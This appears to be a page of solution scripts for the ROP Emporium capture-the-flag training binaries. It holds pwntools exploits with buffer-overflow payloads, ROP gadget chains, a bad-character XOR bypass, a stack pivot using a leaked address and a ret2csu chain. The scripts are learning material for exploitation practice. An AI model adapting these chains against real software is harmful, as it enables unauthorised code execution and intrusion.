# ROP_Emporium Solution
> All scripts are currently only for x86-64
## Ret2win
```python=
from pwn import *
p = process('./ret2win')
#0x400764
t = p64(0x400764)
print(t)
p.sendlineafter(b'> ',b'a' * (32 + 8) + b'\x64\x07\x40\x00\x00\x00\x00\x00')
t = p.recvall(timeout=0.2)
print(t)
```
## Split
```python=
from pwn import *
p = process('./split')
pop_rdi = p64(0x4007c3)
cat_flag = p64(0x601060)
system_call = p64(0x40074B)
payload = b'a' * 40 + pop_rdi + cat_flag + system_call
p.sendlineafter(b'> ',payload)
res = p.recvall(timeout=0.2)
print(res)
```
## Callme
```python=
from pwn import *
p = process('./callme')
pop_3reg = p64(0x40093C)
value_rdi = p64(0xDEADBEEFDEADBEEF)
value_rsi = p64(0xCAFEBABECAFEBABE)
value_rdx = p64(0xD00DF00DD00DF00D)
callme = [p64(0x400720),p64(0x400740),p64(0x4006F0)]
payload = b'a' * 40
for i in callme:
payload += pop_3reg
payload += value_rdi
payload += value_rsi
payload += value_rdx
payload += i
p.sendlineafter(b'> ',payload)
p.interactive()
# res = p.recvall(timeout=0.5)
# print(res)
```
## Write4
```python=
from pwn import *
def start():
global chall
if args.REMOTE:
chall = remote('localhost', 1337)
else:
chall = elf.process()
context.binary = elf = ELF('./write4')
start()
pop_r14_15 = p64(0x400690)
bss_addr = p64(0x601038)
pop_rdi = p64(0x400693)
print_addr = p64(0x400510)
mov_r14_r15 = p64(0x400628) #mov [r14], r15
payload = b'A' * 40
payload += pop_r14_15
payload += bss_addr
payload += b'flag.txt'
payload += mov_r14_r15
payload += pop_rdi
payload += bss_addr
payload += print_addr
chall.recvuntil(b'> ')
chall.sendline(payload)
chall.interactive()
```
## Badchars:
```python
from pwn import *
def start():
global chall
if args.REMOTE:
chall = remote('localhost', 1337)
else:
chall = elf.process()
context.binary = elf = ELF('./badchars')
start()
bss_addr = p64(0x601038)
mov_r13_r12 = p64(0x400634) #: mov [r13+0], r12
pop_r12_r13 = p64(0x40069c) #: pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
pop_rdi = p64(0x4006a3) #: pop rdi ; ret
xor_r15 = p64(0x400628) #: xor byte ptr [r15], r14b ; ret
flag_enc = bytes([i ^ 0xff for i in b'flag.txt'])
pop_r15 = p64(0x00000000004006a2) #: pop r15 ; ret
print_addr = p64(0x400510)
## set_up bss
payload = b'A' * 40
payload += pop_r12_r13
payload += flag_enc
payload += bss_addr
payload += p64(0xffffffffffffffff) # r14
payload += bss_addr # r15
payload += mov_r13_r12
#bypass badchars
bss = 0x601038
for i in range(8):
payload += pop_r15
payload += p64(bss + i)
payload += xor_r15
# print set up
payload += pop_rdi
payload += bss_addr
payload += print_addr
with open('payload.txt', 'wb') as f:
f.write(payload + b'\n')
chall.sendlineafter(b'> ',payload)
p = chall.recvall(timeout = 0.2)
print(p)
```
## Fluff
- i decided to make it more pleasant to work with by always starting at bit 0 and using the full length of rbx to construct a complete value for rdx
```python=
from pwn import *
def start():
global chall
if args.REMOTE:
chall = remote('localhost', 1337)
else:
chall = elf.process()
context.binary = elf = ELF('./fluff')
# libc = elf.libc
start()
pop_rdi = p64(0x00000000004006a3) # : pop rdi ; ret
xlat_addr = p64(0x400628) # : xlat ; ret
bextr_addr = p64(0x00000000040062A)
# pop rdx
# pop rcx
# add rcx, 3ef2h
# bextr rbx, rcx, rdx
# ret
# al = [rbx + al] => rbx + al = flag[x] => rbx = flag[x] - al
# => len(rbx) = 8 bit upper of rdx; rcx = rbx - 0x3ef2
stosb_addr = p64(0x400639) # stosb; ret
bss_addr = 0x601038
flag_addr = [0x4003C4,0x4003C5,0x4003D6,0x4003CF,0x4003C9,0x4003D8,0x4006C8,0x4003D8]
al = bytearray(b'\x0bflag.tx')
print_addr = p64(0x400510)
payload = b'a' * 40
for i in range(8):
# extract the flag character
payload += bextr_addr
rbx = flag_addr[i] - al[i]
rcx = rbx - 0x3ef2
rdx = (len(bin(rbx)[2:]) << 8)
payload += p64(rdx)
payload += p64(rcx)
# put the current character to bss
payload += xlat_addr
payload += pop_rdi
payload += p64(bss_addr + i)
payload += stosb_addr
payload += pop_rdi
payload += p64(bss_addr)
payload += print_addr
with open('payload.txt', 'wb') as f:
f.write(payload + b'\n')
chall.recvuntil(b'> ')
chall.sendline(payload)
p = chall.recvall(timeout = 0.2)
print(p)
```
## Pivot
```python=
from pwn import *
def start():
global chall
if args.REMOTE:
chall = remote('localhost', 1337)
else:
chall = elf.process()
context.binary = elf = ELF('./pivot')
#libc = elf.libc
start()
payload = b'a\n'
chall.send(payload)
res = chall.recvuntil(b'\nSend')
res = res.replace(b'\n',b' ').split()
leak_addr = int(res[-2].decode(),16) #0x7ff1155ecf10
payload = b'a' * 40 + p64(leak_addr + 0x213b71)
chall.sendline(payload)
t = chall.recvall(timeout=0.2)
print(t)
# with open('payload.txt', 'wb') as f:
# f.write(b'a\n')
# f.write(payload + b'\n')
# chall.recvall(timeout = 0.2)
```
## Ret2csu
```python!
from pwn import *
def start():
global chall
if args.REMOTE:
chall = remote('localhost', 1337)
else:
chall = elf.process()
context.binary = elf = ELF('./ret2csu')
#libc = elf.libc
start()
payload = b'A' * 40
dum_func = p64(0x0600E48)
pop_reg = p64(0x40069A)
# pop rbx
# .text:000000000040069B 5D pop rbp
# .text:000000000040069C 41 5C pop r12
# .text:000000000040069E 41 5D pop r13
# .text:00000000004006A0 41 5E pop r14
# .text:00000000004006A2 41 5F pop r15
# .text:00000000004006A4 C3 retn
modify_rdx = p64(0x400680)
# loc_400680: ; CODE XREF: __libc_csu_init+54↓j
# .text:0000000000400680 4C 89 FA mov rdx, r15
# .text:0000000000400683 4C 89 F6 mov rsi, r14
# .text:0000000000400686 44 89 EF mov edi, r13d
# .text:0000000000400689 41 FF 14 DC call ds:(__frame_dummy_init_array_entry - 600DF0h)[r12+rbx*8]
# .text:0000000000400689
# .text:000000000040068D 48 83 C3 01 add rbx, 1
# .text:0000000000400691 48 39 DD cmp rbp, rbx
# .text:0000000000400694 75 EA jnz short loc_400680
# .text:0000000000400694
# .text:0000000000400696
# .text:0000000000400696 loc_400696: ; CODE XREF: __libc_csu_init+34↑j
# .text:0000000000400696 48 83 C4 08 add rsp, 8
# .text:000000000040069A 5B pop rbx
# .text:000000000040069B 5D pop rbp
# .text:000000000040069C 41 5C pop r12
# .text:000000000040069E 41 5D pop r13
# .text:00000000004006A0 41 5E pop r14
# .text:00000000004006A2 41 5F pop r15
# .text:00000000004006A4 C3 retn
# .text:00000000004006A4 ; } // starts at 400640
pop_rdi = p64(0x00000000004006a3)
ret2win = p64(0x400510)
payload += pop_reg
payload += p64(0)
payload += p64(1)
payload += dum_func
payload += p64(0)
payload += p64(0xCAFEBABECAFEBABE)
payload += p64(0xD00DF00DD00DF00D)
payload += modify_rdx
payload += p64(0) * 7
payload += pop_rdi
payload += p64(0xDEADBEEFDEADBEEF)
payload += ret2win
with open('payload.txt', 'wb') as f:
f.write(payload + b'\n')
chall.recvuntil(b'> ')
chall.sendline(payload)
t = chall.recvall(timeout = 0.2)
print(t)
```
Sign in with Wallet
Connect another wallet